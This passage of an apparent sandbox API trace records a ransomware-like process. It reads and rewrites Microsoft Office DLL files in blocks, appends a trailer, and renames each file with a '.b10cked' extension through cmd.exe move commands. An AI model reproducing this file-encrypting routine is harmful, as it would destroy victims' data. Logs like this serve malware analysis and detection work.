| out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6960 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.949] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6960 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.949] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0172.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.950] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0172.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0172.950] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0172.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0172.951] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0172.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0172.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0172.955] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6960 [0172.955] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.955] CloseHandle (hObject=0x114) returned 1 [0172.956] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX") returned 0x3c [0172.957] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.957] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa60, dwThreadId=0xaf4)) returned 1 [0172.964] CloseHandle (hObject=0x1b4) returned 1 [0172.964] CloseHandle (hObject=0x114) returned 1 [0172.964] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.964] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.964] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.965] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all 
users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22975417943) returned 1 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x73478 [0172.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x73960 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x73960 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.078] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.174] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.174] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0173.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.176] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.177] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.177] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0173.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x53960 [0173.177] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.318] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.318] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0173.319] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) 
returned 0x53960 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0173.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0173.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0173.324] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x73960 [0173.324] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0173.324] CloseHandle (hObject=0x114) returned 1 [0173.330] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX") returned 
0x3c [0173.331] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0173.331] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa68, dwThreadId=0xb18)) returned 1 [0173.379] CloseHandle (hObject=0x1b4) returned 1 [0173.379] CloseHandle (hObject=0x114) returned 1 [0173.379] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0173.379] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0173.379] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL 
USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23016911445) returned 1 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x24360 